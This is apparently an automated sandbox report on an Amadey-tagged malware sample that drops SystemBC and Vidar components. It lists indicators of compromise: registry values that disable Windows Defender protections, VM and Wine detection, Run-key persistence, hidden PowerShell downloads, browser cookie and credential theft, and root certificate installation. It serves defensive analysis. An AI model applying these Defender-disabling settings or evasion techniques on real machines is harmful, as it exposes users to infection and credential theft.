amadey | f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE

Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs

evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE

Modifies Windows Defender notification settings 3 TTPs 2 IoCs

defense_evasion trojan

Windows Service

Modify Registry

Disable or Modify Tools

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE

SystemBC
SystemBC is a proxy and remote administration tool first seen in 2019.
trojan systembc
Systembc family
systembc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 16 IoCs

defense_evasion

Query Registry

Virtualization/Sandbox Evasion

credential_access stealer

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	728eb8fad7.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	NthMhDa.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	NthMhDa.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Hdn6gzf.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	fefef60740.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	GKjci28.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Hdn6gzf.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	skotes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	GKjci28.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	inet.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	apitlt.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	lFlj2tl.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	483d2fa8a0d53818306efeb32d3.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
27	1756	powershell.exe
31	2780	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1756	powershell.exe
2780	powershell.exe
1700	powershell.exe
872	powershell.exe
2052	powershell.exe

Downloads MZ/PE file 7 IoCs

flow	pid	Process
23	2716	skotes.exe
78	2264	BitLockerToGo.exe
80	1548	BitLockerToGo.exe
27	1756	powershell.exe
31	2780	powershell.exe
107	2716	skotes.exe
5	2716	skotes.exe

Uses browser remote debugging 2 TTPs 4 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

Steal Web Session Cookie

T1539

Modify Authentication Process

pid	Process
1828	chrome.exe
2164	chrome.exe
1292	chrome.exe
1316	chrome.exe

Checks BIOS information in registry 2 TTPs 32 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	NthMhDa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	fefef60740.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	GKjci28.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	inet.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Hdn6gzf.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Hdn6gzf.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	inet.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	apitlt.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	apitlt.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	728eb8fad7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	728eb8fad7.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	fefef60740.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	GKjci28.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Gxtuum.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Gxtuum.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	GKjci28.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	NthMhDa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	lFlj2tl.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Hdn6gzf.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	lFlj2tl.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	skotes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	GKjci28.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Hdn6gzf.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	NthMhDa.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	NthMhDa.exe

Executes dropped EXE 25 IoCs

pid	Process
2716	skotes.exe
2940	HsDTj78.exe
1740	KsqTMuf.exe
2820	KsqTMuf.exe
2996	lFlj2tl.exe
264	dbf56223ab.exe
2944	TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE
1644	NthMhDa.exe
2056	483d2fa8a0d53818306efeb32d3.exe
628	Gxtuum.exe
2912	GKjci28.exe
1804	inet.exe
2708	apitlt.exe
2880	728eb8fad7.exe
2652	fefef60740.exe
2572	ff28c3aaec.exe
2232	2f4444c5a8.exe
2468	KsqTMuf.exe
1316	KsqTMuf.exe
2000	KsqTMuf.exe
2992	NthMhDa.exe
2280	HsDTj78.exe
2276	GKjci28.exe
936	Hdn6gzf.exe
600	Hdn6gzf.exe

Identifies Wine through registry keys 2 TTPs 16 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

Virtualization/Sandbox Evasion

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine	Gxtuum.exe
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine	728eb8fad7.exe
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine	fefef60740.exe
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine	Hdn6gzf.exe
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine	skotes.exe
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine	NthMhDa.exe
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine	GKjci28.exe
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine	inet.exe
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine	GKjci28.exe
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine	TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine	apitlt.exe
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine	NthMhDa.exe
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine	Hdn6gzf.exe
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine	f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe
Key opened	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine	lFlj2tl.exe

Loads dropped DLL 48 IoCs

pid	Process
2520	f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe
2520	f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe
2716	skotes.exe
2716	skotes.exe
2716	skotes.exe
1740	KsqTMuf.exe
1608	WerFault.exe
1608	WerFault.exe
1608	WerFault.exe
2716	skotes.exe
2716	skotes.exe
1756	powershell.exe
1756	powershell.exe
2716	skotes.exe
2716	skotes.exe
2780	powershell.exe
2780	powershell.exe
1644	NthMhDa.exe
1644	NthMhDa.exe
2716	skotes.exe
2716	skotes.exe
628	Gxtuum.exe
628	Gxtuum.exe
2716	skotes.exe
2716	skotes.exe
2716	skotes.exe
2716	skotes.exe
2716	skotes.exe
2716	skotes.exe
2716	skotes.exe
2716	skotes.exe
2716	skotes.exe
2468	KsqTMuf.exe
2468	KsqTMuf.exe
2576	WerFault.exe
2576	WerFault.exe
2576	WerFault.exe
2716	skotes.exe
2716	skotes.exe
2716	skotes.exe
2716	skotes.exe
2716	skotes.exe
2264	BitLockerToGo.exe
2716	skotes.exe
2716	skotes.exe
2716	skotes.exe
2716	skotes.exe
1548	BitLockerToGo.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

Windows security modification 2 TTPs 2 IoCs

defense_evasion trojan

Disable or Modify Tools

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features	TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0"	TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091694021\\am_no.cmd"	skotes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Windows\CurrentVersion\Run\dbf56223ab.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1091693101\\dbf56223ab.exe"	skotes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

AutoIT Executable 1 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000900000001871c-200.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs

pid	Process
2520	f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe
2716	skotes.exe
2996	lFlj2tl.exe
2944	TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE
1644	NthMhDa.exe
2056	483d2fa8a0d53818306efeb32d3.exe
628	Gxtuum.exe
2912	GKjci28.exe
1804	inet.exe
2708	apitlt.exe
2880	728eb8fad7.exe
2652	fefef60740.exe
2992	NthMhDa.exe
2276	GKjci28.exe
936	Hdn6gzf.exe
600	Hdn6gzf.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 1740 set thread context of 2820	1740	KsqTMuf.exe	36
PID 2880 set thread context of 2264	2880	728eb8fad7.exe	91
PID 2652 set thread context of 1548	2652	fefef60740.exe	93
PID 2468 set thread context of 2000	2468	KsqTMuf.exe	100

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\skotes.job	f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe
File created	C:\Windows\Tasks\Gxtuum.job	NthMhDa.exe
File created	C:\Windows\Tasks\Test Task17.job	inet.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 2 IoCs

pid	pid_target	Process	procid_target
1608	1740	WerFault.exe	34
2576	2468	WerFault.exe	97

System Location Discovery: System Language Discovery 1 TTPs 41 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempAAVUNL529HLYJ9RPGTBNFJMHDSCRI4WF.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GKjci28.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ff28c3aaec.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	KsqTMuf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	KsqTMuf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dbf56223ab.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	728eb8fad7.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Hdn6gzf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apitlt.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2f4444c5a8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Hdn6gzf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	skotes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	KsqTMuf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Gxtuum.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	inet.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	KsqTMuf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f5ff8a614f7c4b46d0b1e60dc1b0af7a8ceedb2e96155d8848d74ff16e48d7a5.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	lFlj2tl.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GKjci28.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NthMhDa.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fefef60740.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	lFlj2tl.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	lFlj2tl.exe

Delays execution with timeout.exe 2 IoCs

defense_evasion

pid	Process
1044	timeout.exe
1980	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

defense_evasion spyware trojan

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies system certificate store 2 TTPs 5 IoCs

Install Root Certificate

T1553.004

Modify Registry

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	lFlj2tl.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	2f4444c5a8.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	2f4444c5a8.exe
